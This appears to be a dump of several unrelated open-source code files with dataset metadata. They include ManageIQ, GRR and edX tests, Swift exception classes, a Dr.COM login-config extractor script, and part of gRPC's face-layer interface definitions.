'$evm.log(:info, "storage name: #{storage_name}")\n'
'storages = vm.storages\n'
'storage_name = storages[0].name\n'
'$evm.log(:info, "storages name: #{storage_name}")\n'
)
instance = custom_instance(ruby_code=list_storages)
with LogValidator(
"/var/www/miq/vmdb/log/automation.log",
matched_patterns=[
f".*storage name: {testing_vm.datastore.name}.*",
f".*storages name: {testing_vm.datastore.name}.*",
],
).waiting(timeout=120):
# Executing automate method using simulation
simulate(
appliance=appliance,
message="create",
request="Call_Instance",
execute_methods=True,
attributes_values={
"namespace": instance.klass.namespace.name,
"class": instance.klass.name,
"instance": instance.name,
},
)
| gpl-2.0 | -4,176,466,714,598,073,300 | 35.054422 | 100 | 0.641006 | false |
googleinterns/stampify | extraction/content_extractors/embedded_instagram_post_extractor.py | 1 | 1491 | """This script checks whether DOM has embedded instagram
post tag or not and creates and returns the EInstagramPost object"""
from urllib.parse import urlparse
import bs4
from data_models.embedded_instagram_post import EInstagramPost
from extraction.content_extractors.interface_content_extractor import \
IContentExtractor
class EInstagramPostExtractor(IContentExtractor):
"""This class inherits IContentExtractor for extracting
embedded instagram post"""
def validate_and_extract(self, node: bs4.element):
"""Validates if a tag is instagram post tag and
returns the extracted data from the tag in EInstagramPost object"""
if isinstance(node, bs4.element.Tag):
if node.has_attr('class') \
and ('instagram-media' in node['class']
or 'instagram-media-rendered' in node['class']):
return EInstagramPost(self.
__get_instagram_shortcode
(node.find('a')['href']))
if node.name == 'iframe' \
and node.has_attr('src') \
and node['src'].startswith('https://instagram.com/'):
return EInstagramPost(self.
__get_instagram_shortcode
(node['src']))
return None
@staticmethod
def __get_instagram_shortcode(url):
return urlparse(url)[2].split('/')[2]
| apache-2.0 | -1,494,846,459,844,300,800 | 36.275 | 75 | 0.589537 | false |
google/grr | grr/client/grr_response_client/gcs_test.py | 1 | 7459 | #!/usr/bin/env python
import io
import time
from unittest import mock
from absl.testing import absltest
import portpicker
from requests import exceptions
import responses
from grr_response_client import gcs
from grr.test_lib import gcs_test_lib
class UploadSessionTest(absltest.TestCase):
def testOpenIncorrectURL(self):
unused_port = portpicker.pick_unused_port()
with self.assertRaises(gcs.RequestError) as context:
gcs.UploadSession.Open(f"https://localhost:{unused_port}")
cause = context.exception.__cause__
self.assertIsInstance(cause, exceptions.ConnectionError)
@responses.activate
def testOpenIncorrectResponseStatus(self):
responses.add(responses.POST, "https://foo.bar/quux", status=404)
with self.assertRaisesRegex(gcs.ResponseError, "Unexpected status"):
gcs.UploadSession.Open("https://foo.bar/quux")
@responses.activate
def testOpenIncorrectResponseHeader(self):
responses.add(responses.POST, "https://foo.bar/quux", status=201)
with self.assertRaisesRegex(gcs.ResponseError, "Missing session URI"):
gcs.UploadSession.Open("https://foo.bar/quux")
@responses.activate
def testOpen(self):
response = responses.Response(responses.POST, "https://foo.bar/quux")
response.status = 201
response.headers = {
"Location": "https://quux.thud/blargh",
}
responses.add(response)
session = gcs.UploadSession.Open("https://foo.bar/quux")
self.assertEqual(session.uri, "https://quux.thud/blargh")
def testSendFileTransmissionFailure(self):
unused_port = portpicker.pick_unused_port()
session = gcs.UploadSession(f"https://localhost:{unused_port}")
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 1
opts.retry_chunk_init_delay = 0.0
with self.assertRaises(gcs.RequestError) as context:
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
cause = context.exception.__cause__
self.assertIsInstance(cause, exceptions.ConnectionError)
@responses.activate
def testSendFileInterrupted(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=503)
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 1
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/quux")
with self.assertRaises(gcs.InterruptedResponseError):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileCancelledUpload(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=499)
session = gcs.UploadSession("https://foo.bar/quux")
with self.assertRaises(gcs.ResponseError):
session.SendFile(io.BytesIO(b"foobar"))
@responses.activate
def testSendFileIncorrectResponseLastChunk(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=301)
session = gcs.UploadSession("https://foo.bar/quux")
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1024
with self.assertRaisesRegex(gcs.ResponseError, "final chunk"):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileIncorrectResponseIntermediateChunk(self):
responses.add(responses.PUT, "https://foo.bar/quux", status=301)
session = gcs.UploadSession("https://foo.bar/quux")
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
with self.assertRaisesRegex(gcs.ResponseError, "mid chunk"):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
@responses.activate
def testSendFileEmpty(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b""))
self.assertEqual(handler.content, b"")
@responses.activate
def testSendFileSingleChunk(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
content = b"foobar"
opts = gcs.UploadSession.Opts()
opts.chunk_size = len(content)
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(content), opts=opts)
self.assertEqual(handler.content, content)
@responses.activate
def testSendFileMultipleChunks(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(handler.content, b"foobar")
@responses.activate
def testSendFileRetrySuccess(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add(responses.PUT, "https://foo.bar/qux", status=502)
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
responses.add(responses.PUT, "https://foo.bar/qux", status=504)
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.retry_chunk_attempts = 4
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(handler.content, b"foobar")
@responses.activate
def testSendFileRetryFailure(self):
handler = gcs_test_lib.FakeUploadHandler()
responses.add(responses.PUT, "https://foo.bar/qux", status=502)
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
responses.add(responses.PUT, "https://foo.bar/qux", status=504)
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.retry_chunk_attempts = 3
opts.retry_chunk_init_delay = 0.0
session = gcs.UploadSession("https://foo.bar/qux")
with self.assertRaises(gcs.InterruptedResponseError) as context:
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
self.assertEqual(context.exception.response.status_code, 504)
@responses.activate
def testSendFileChunkProgress(self):
data = b"foobar"
handler = gcs_test_lib.FakeUploadHandler()
responses.add_callback(responses.PUT, "https://foo.bar/qux", handler)
counter = 0
def Progress() -> None:
nonlocal counter
counter += 1
opts = gcs.UploadSession.Opts()
opts.chunk_size = 1
opts.progress_callback = Progress
session = gcs.UploadSession("https://foo.bar/qux")
session.SendFile(io.BytesIO(data), opts=opts)
self.assertGreaterEqual(counter, len(data))
@responses.activate
@mock.patch.object(time, "sleep", lambda _: None)
def testSendFileRetryProgress(self):
responses.add(responses.PUT, "https://foo.bar/qux", status=503)
counter = 0
def Progress() -> None:
nonlocal counter
counter += 1
opts = gcs.UploadSession.Opts()
opts.retry_chunk_attempts = 2
opts.retry_chunk_init_delay = 10.0
opts.progress_interval = 1.0
opts.progress_callback = Progress
session = gcs.UploadSession("https://foo.bar/qux")
with self.assertRaises(gcs.InterruptedResponseError):
session.SendFile(io.BytesIO(b"foobar"), opts=opts)
# We should sleep for 10 seconds and do progress calls every second, so it
# should be called at least 10 times.
self.assertGreaterEqual(counter, 10)
if __name__ == "__main__":
absltest.main()
| apache-2.0 | 7,925,162,750,375,830,000 | 30.209205 | 78 | 0.70787 | false |
CLVsol/odoo_addons | clv_insured_mng/role/__init__.py | 5 | 1423 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
import clv_insured
| agpl-3.0 | 442,853,416,153,108,030 | 70.15 | 80 | 0.406887 | false |
clayg/swift | swift/common/exceptions.py | 6 | 5464 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from eventlet import Timeout
import swift.common.utils
class MessageTimeout(Timeout):
def __init__(self, seconds=None, msg=None):
Timeout.__init__(self, seconds=seconds)
self.msg = msg
def __str__(self):
return '%s: %s' % (Timeout.__str__(self), self.msg)
class SwiftException(Exception):
pass
class PutterConnectError(Exception):
def __init__(self, status=None):
self.status = status
class InvalidTimestamp(SwiftException):
pass
class InsufficientStorage(SwiftException):
pass
class FooterNotSupported(SwiftException):
pass
class MultiphasePUTNotSupported(SwiftException):
pass
class SuffixSyncError(SwiftException):
pass
class RangeAlreadyComplete(SwiftException):
pass
class DiskFileError(SwiftException):
pass
class DiskFileNotOpen(DiskFileError):
pass
class DiskFileQuarantined(DiskFileError):
pass
class DiskFileCollision(DiskFileError):
pass
class DiskFileNotExist(DiskFileError):
pass
class DiskFileDeleted(DiskFileNotExist):
def __init__(self, metadata=None):
self.metadata = metadata or {}
self.timestamp = swift.common.utils.Timestamp(
self.metadata.get('X-Timestamp', 0))
class DiskFileExpired(DiskFileDeleted):
pass
class DiskFileNoSpace(DiskFileError):
pass
class DiskFileDeviceUnavailable(DiskFileError):
pass
class DiskFileXattrNotSupported(DiskFileError):
pass
class DeviceUnavailable(SwiftException):
pass
class InvalidAccountInfo(SwiftException):
pass
class PathNotDir(OSError):
pass
class ChunkReadError(SwiftException):
pass
class ChunkReadTimeout(Timeout):
pass
class ChunkWriteTimeout(Timeout):
pass
class ConnectionTimeout(Timeout):
pass
class ResponseTimeout(Timeout):
pass
class DriveNotMounted(SwiftException):
pass
class LockTimeout(MessageTimeout):
pass
class RingLoadError(SwiftException):
pass
class RingBuilderError(SwiftException):
pass
class RingValidationError(RingBuilderError):
pass
class EmptyRingError(RingBuilderError):
pass
class DuplicateDeviceError(RingBuilderError):
pass
class UnPicklingError(SwiftException):
pass
class FileNotFoundError(SwiftException):
pass
class PermissionError(SwiftException):
pass
class ListingIterError(SwiftException):
pass
class ListingIterNotFound(ListingIterError):
pass
class ListingIterNotAuthorized(ListingIterError):
def __init__(self, aresp):
self.aresp = aresp
class SegmentError(SwiftException):
pass
class ReplicationException(Exception):
pass
class ReplicationLockTimeout(LockTimeout):
pass
class MimeInvalid(SwiftException):
pass
class APIVersionError(SwiftException):
pass
class EncryptionException(SwiftException):
pass
class ClientException(Exception):
def __init__(self, msg, http_scheme='', http_host='', http_port='',
http_path='', http_query='', http_status=None, http_reason='',
http_device='', http_response_content='', http_headers=None):
super(ClientException, self).__init__(msg)
self.msg = msg
self.http_scheme = http_scheme
self.http_host = http_host
self.http_port = http_port
self.http_path = http_path
self.http_query = http_query
self.http_status = http_status
self.http_reason = http_reason
self.http_device = http_device
self.http_response_content = http_response_content
self.http_headers = http_headers or {}
def __str__(self):
a = self.msg
b = ''
if self.http_scheme:
b += '%s://' % self.http_scheme
if self.http_host:
b += self.http_host
if self.http_port:
b += ':%s' % self.http_port
if self.http_path:
b += self.http_path
if self.http_query:
b += '?%s' % self.http_query
if self.http_status:
if b:
b = '%s %s' % (b, self.http_status)
else:
b = str(self.http_status)
if self.http_reason:
if b:
b = '%s %s' % (b, self.http_reason)
else:
b = '- %s' % self.http_reason
if self.http_device:
if b:
b = '%s: device %s' % (b, self.http_device)
else:
b = 'device %s' % self.http_device
if self.http_response_content:
if len(self.http_response_content) <= 60:
b += ' %s' % self.http_response_content
else:
b += ' [first 60 chars of response] %s' \
% self.http_response_content[:60]
return b and '%s: %s' % (a, b) or a
class InvalidPidFileException(Exception):
pass
| apache-2.0 | 5,727,988,254,764,160,000 | 18.941606 | 79 | 0.644949 | false |
mchome/drcom-generic | drcom_d_config.py | 1 | 1705 | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 03 23:45:49 2014
@author: latyas
"""
from binascii import hexlify
import re
def hexed(s):
ret = ''
for i in s:
ret += '\\x' + hex(ord(i))[2:].rjust(2, '0')
return ret
filename = '998'
f = open(filename, 'rb')
text = f.read()
offset = re.search('\xf0\x00\xf0\x00[\x00-\xFF]{4}[\x03\x07]\x01', text).start() + 8
#print hexlify(text[offset:offset+330])
print 'pcapng file:', filename
print 'copy following statements to drcom.conf or overwrite field between "# CONFIG" and "# CONFIG_END" in latest-wired.py'
print '\n'
username_len = ord(text[offset+3]) - 20
username = text[offset+20:offset+20+username_len]
print 'server = \'%s\'' % '.'.join([str(ord(i)) for i in text[offset-12:offset-8]])
print 'username=\'%s\'' % username
print 'password=\'\''
print 'CONTROLCHECKSTATUS = \'%s\'' % hexed(text[offset+56])
print 'ADAPTERNUM = \'%s\'' % hexed(text[offset+57])
print 'host_ip = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+81:offset+85]))
print 'IPDOG = \'%s\'' % hexed(text[offset+105])
print 'host_name = \'%s\'' % 'DRCOMFUCKER'
print 'PRIMARY_DNS = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+142 :offset+146]))
print 'dhcp_server = \'%s\'' % '.'.join(map(lambda x: str(ord(x)), text[offset+146:offset+150]))
print 'AUTH_VERSION = \'%s\'' % hexed(text[offset+310:offset+312])
print 'mac = 0x%s' % hexlify(text[offset+320:offset+326])
print 'host_os = \'%s\'' % 'WINDIAOS'
# now get the version field in heartbeat
KEEP_ALIVE_VERSION = [i for i in re.findall('\xf0\x00\xf0\x00....\x07.\x5c\x28\x00\x0b\x01(..)', text) if i != '\x0f\x27'][0]
print 'KEEP_ALIVE_VERSION = \'%s\'' % hexed(KEEP_ALIVE_VERSION)
| agpl-3.0 | -2,382,771,327,867,114,000 | 38.651163 | 125 | 0.629912 | false |
hmcmooc/muddx-platform | lms/djangoapps/bulk_email/tests/test_models.py | 3 | 5892 | """
Unit tests for bulk-email-related models.
"""
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from student.tests.factories import UserFactory
from mock import patch
from bulk_email.models import CourseEmail, SEND_TO_STAFF, CourseEmailTemplate, CourseAuthorization
from xmodule.modulestore.locations import SlashSeparatedCourseKey
class CourseEmailTest(TestCase):
"""Test the CourseEmail model."""
def test_creation(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = SEND_TO_STAFF
subject = "dummy subject"
html_message = "<html>dummy message</html>"
email = CourseEmail.create(course_id, sender, to_option, subject, html_message)
self.assertEquals(email.course_id, course_id)
self.assertEquals(email.to_option, SEND_TO_STAFF)
self.assertEquals(email.subject, subject)
self.assertEquals(email.html_message, html_message)
self.assertEquals(email.sender, sender)
def test_bad_to_option(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
sender = UserFactory.create()
to_option = "fake"
subject = "dummy subject"
html_message = "<html>dummy message</html>"
with self.assertRaises(ValueError):
CourseEmail.create(course_id, sender, to_option, subject, html_message)
class NoCourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model without loading the template data."""
def test_get_missing_template(self):
with self.assertRaises(CourseEmailTemplate.DoesNotExist):
CourseEmailTemplate.get_template()
class CourseEmailTemplateTest(TestCase):
"""Test the CourseEmailTemplate model."""
def setUp(self):
# load initial content (since we don't run migrations as part of tests):
call_command("loaddata", "course_email_template.json")
def _get_sample_plain_context(self):
"""Provide sample context sufficient for rendering plaintext template"""
context = {
'course_title': "Bogus Course Title",
'course_url': "/location/of/course/url",
'account_settings_url': "/location/of/account/settings/url",
'platform_name': 'edX',
'email': '[email protected]',
}
return context
def _get_sample_html_context(self):
"""Provide sample context sufficient for rendering HTML template"""
context = self._get_sample_plain_context()
context['course_image_url'] = "/location/of/course/image/url"
return context
def test_get_template(self):
template = CourseEmailTemplate.get_template()
self.assertIsNotNone(template.html_template)
self.assertIsNotNone(template.plain_template)
def test_render_html_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_html_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_htmltext("My new html text.", context)
def test_render_plaintext_without_context(self):
template = CourseEmailTemplate.get_template()
base_context = self._get_sample_plain_context()
for keyname in base_context:
context = dict(base_context)
del context[keyname]
with self.assertRaises(KeyError):
template.render_plaintext("My new plain text.", context)
def test_render_html(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_html_context()
template.render_htmltext("My new html text.", context)
def test_render_plain(self):
template = CourseEmailTemplate.get_template()
context = self._get_sample_plain_context()
template.render_plaintext("My new plain text.", context)
class CourseAuthorizationTest(TestCase):
"""Test the CourseAuthorization model."""
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': True})
def test_creation_auth_on(self):
course_id = SlashSeparatedCourseKey('abc', '123', 'doremi')
# Test that course is not authorized by default
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
# Authorize
cauth = CourseAuthorization(course_id=course_id, email_enabled=True)
cauth.save()
# Now, course should be authorized
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Enabled"
)
# Unauthorize by explicitly setting email_enabled to False
cauth.email_enabled = False
cauth.save()
# Test that course is now unauthorized
self.assertFalse(CourseAuthorization.instructor_email_enabled(course_id))
self.assertEquals(
cauth.__unicode__(),
"Course 'abc/123/doremi': Instructor Email Not Enabled"
)
@patch.dict(settings.FEATURES, {'REQUIRE_COURSE_EMAIL_AUTH': False})
def test_creation_auth_off(self):
course_id = SlashSeparatedCourseKey('blahx', 'blah101', 'ehhhhhhh')
# Test that course is authorized by default, since auth is turned off
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
# Use the admin interface to unauthorize the course
cauth = CourseAuthorization(course_id=course_id, email_enabled=False)
cauth.save()
# Now, course should STILL be authorized!
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
| agpl-3.0 | -1,810,809,775,772,614,400 | 38.810811 | 98 | 0.668534 | false |
miselin/grpc | src/python/grpcio/grpc/framework/face/interfaces.py | 2 | 23418 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Interfaces for the face layer of RPC Framework."""
import abc
import enum
import six
# cardinality, style, exceptions, abandonment, future, and stream are
# referenced from specification in this module.
from grpc.framework.common import cardinality # pylint: disable=unused-import
from grpc.framework.common import style # pylint: disable=unused-import
from grpc.framework.face import exceptions # pylint: disable=unused-import
from grpc.framework.foundation import abandonment # pylint: disable=unused-import
from grpc.framework.foundation import future # pylint: disable=unused-import
from grpc.framework.foundation import stream # pylint: disable=unused-import
@enum.unique
class Abortion(enum.Enum):
"""Categories of RPC abortion."""
CANCELLED = 'cancelled'
EXPIRED = 'expired'
NETWORK_FAILURE = 'network failure'
SERVICED_FAILURE = 'serviced failure'
SERVICER_FAILURE = 'servicer failure'
class CancellableIterator(six.with_metaclass(abc.ABCMeta)):
"""Implements the Iterator protocol and affords a cancel method."""
@abc.abstractmethod
def __iter__(self):
"""Returns the self object in accordance with the Iterator protocol."""
raise NotImplementedError()
def __next__(self):
return self.next()
@abc.abstractmethod
def next(self):
"""Returns a value or raises StopIteration per the Iterator protocol."""
raise NotImplementedError()
@abc.abstractmethod
def cancel(self):
"""Requests cancellation of whatever computation underlies this iterator."""
raise NotImplementedError()
class RpcContext(six.with_metaclass(abc.ABCMeta)):
"""Provides RPC-related information and action."""
@abc.abstractmethod
def is_active(self):
"""Describes whether the RPC is active or has terminated."""
raise NotImplementedError()
@abc.abstractmethod
def time_remaining(self):
"""Describes the length of allowed time remaining for the RPC.
Returns:
A nonnegative float indicating the length of allowed time in seconds
remaining for the RPC to complete before it is considered to have timed
out.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_abortion_callback(self, abortion_callback):
"""Registers a callback to be called if the RPC is aborted.
Args:
abortion_callback: A callable to be called and passed an Abortion value
in the event of RPC abortion.
"""
raise NotImplementedError()
class Call(six.with_metaclass(abc.ABCMeta)):
"""Invocation-side representation of an RPC.
Attributes:
context: An RpcContext affording information about the RPC.
"""
@abc.abstractmethod
def cancel(self):
"""Requests cancellation of the RPC."""
raise NotImplementedError()
class UnaryUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-unary RPC in any call style."""
@abc.abstractmethod
def __call__(self, request, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future's result value will be the response value of the RPC.
In the event of RPC abortion, the returned Future's exception value
will be an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, request, response_callback, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
response_callback: A callback to be called to accept the restponse value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
class UnaryStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-stream RPC in any call style."""
@abc.abstractmethod
def __call__(self, request, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion
of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, request, response_consumer, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
response_consumer: A stream.Consumer to be called to accept the restponse
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
class StreamUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-unary RPC in any call style."""
@abc.abstractmethod
def __call__(self, request_iterator, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request_iterator, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future's result value will be the response value of the RPC.
In the event of RPC abortion, the returned Future's exception value
will be an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, response_callback, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
response_callback: A callback to be called to accept the restponse value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
class StreamStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-stream RPC in any call style."""
@abc.abstractmethod
def __call__(self, request_iterator, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion
of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, response_consumer, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
l Args:
response_consumer: A stream.Consumer to be called to accept the restponse
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
class MethodImplementation(six.with_metaclass(abc.ABCMeta)):
"""A sum type that describes an RPC method implementation.
Attributes:
cardinality: A cardinality.Cardinality value.
style: A style.Service value.
unary_unary_inline: The implementation of the RPC method as a callable
value that takes a request value and an RpcContext object and returns a
response value. Only non-None if cardinality is
cardinality.Cardinality.UNARY_UNARY and style is style.Service.INLINE.
unary_stream_inline: The implementation of the RPC method as a callable
value that takes a request value and an RpcContext object and returns an
iterator of response values. Only non-None if cardinality is
cardinality.Cardinality.UNARY_STREAM and style is style.Service.INLINE.
stream_unary_inline: The implementation of the RPC method as a callable
value that takes an iterator of request values and an RpcContext object
and returns a response value. Only non-None if cardinality is
cardinality.Cardinality.STREAM_UNARY and style is style.Service.INLINE.
stream_stream_inline: The implementation of the RPC method as a callable
value that takes an iterator of request values and an RpcContext object
and returns an iterator of response values. Only non-None if cardinality
is cardinality.Cardinality.STREAM_STREAM and style is
style.Service.INLINE.
unary_unary_event: The implementation of the RPC method as a callable value
that takes a request value, a response callback to which to pass the
response value of the RPC, and an RpcContext. Only non-None if
cardinality is cardinality.Cardinality.UNARY_UNARY and style is
style.Service.EVENT.
unary_stream_event: The implementation of the RPC method as a callable
value that takes a request value, a stream.Consumer to which to pass the
the response values of the RPC, and an RpcContext. Only non-None if
cardinality is cardinality.Cardinality.UNARY_STREAM and style is
style.Service.EVENT.
stream_unary_event: The implementation of the RPC method as a callable
value that takes a response callback to which to pass the response value
of the RPC and an RpcContext and returns a stream.Consumer to which the
request values of the RPC should be passed. Only non-None if cardinality
is cardinality.Cardinality.STREAM_UNARY and style is style.Service.EVENT.
stream_stream_event: The implementation of the RPC method as a callable
value that takes a stream.Consumer to which to pass the response values
of the RPC and an RpcContext and returns a stream.Consumer to which the
request values of the RPC should be passed. Only non-None if cardinality
is cardinality.Cardinality.STREAM_STREAM and style is
style.Service.EVENT.
"""
class MultiMethodImplementation(six.with_metaclass(abc.ABCMeta)):
"""A general type able to service many RPC methods."""
@abc.abstractmethod
def service(self, name, response_consumer, context):
"""Services an RPC.
Args:
name: The RPC method name.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
context: An RpcContext object.
Returns:
A stream.Consumer with which to accept the request values of the RPC. The
consumer returned from this method may or may not be invoked to
completion: in the case of RPC abortion, RPC Framework will simply stop
passing values to this object. Implementations must not assume that this
object will be called to completion of the request stream or even called
at all.
Raises:
abandonment.Abandoned: May or may not be raised when the RPC has been
aborted.
exceptions.NoSuchMethodError: If this MultiMethod does not recognize the
given RPC method name and is not able to service the RPC.
"""
raise NotImplementedError()
class GenericStub(six.with_metaclass(abc.ABCMeta)):
"""Affords RPC methods to callers."""
@abc.abstractmethod
